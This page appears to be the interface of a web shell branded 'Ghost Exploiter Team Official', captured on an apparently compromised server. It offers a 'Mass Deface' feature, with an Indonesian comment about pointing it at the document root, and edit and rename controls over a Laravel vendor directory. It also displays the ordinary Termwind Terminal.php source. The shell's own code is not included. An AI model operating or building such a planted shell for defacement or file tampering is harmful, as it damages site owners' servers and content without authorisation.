Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
nunomaduro
/
termwind
/
src
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
Actions
--
ren
Components
--
ren
Enums
--
ren
Exceptions
--
ren
Helpers
--
ren
Html
--
ren
Laravel
--
ren
Repositories
--
ren
ValueObjects
--
ren
Functions.php
1.736KB
edt
ren
HtmlRenderer.php
3.845KB
edt
ren
Question.php
2.476KB
edt
ren
Terminal.php
0.864KB
edt
ren
Termwind.php
9.025KB
edt
ren
<?php declare(strict_types=1); namespace Termwind; use Symfony\Component\Console\Terminal as ConsoleTerminal; /** * @internal */ final class Terminal { /** * An instance of Symfony's console terminal. */ private ConsoleTerminal $terminal; /** * Creates a new terminal instance. */ public function __construct(?ConsoleTerminal $terminal = null) { $this->terminal = $terminal ?? new ConsoleTerminal; } /** * Gets the terminal width. */ public function width(): int { return $this->terminal->getWidth(); } /** * Gets the terminal height. */ public function height(): int { return $this->terminal->getHeight(); } /** * Clears the terminal screen. */ public function clear(): void { Termwind::getRenderer()->write("\ec"); } }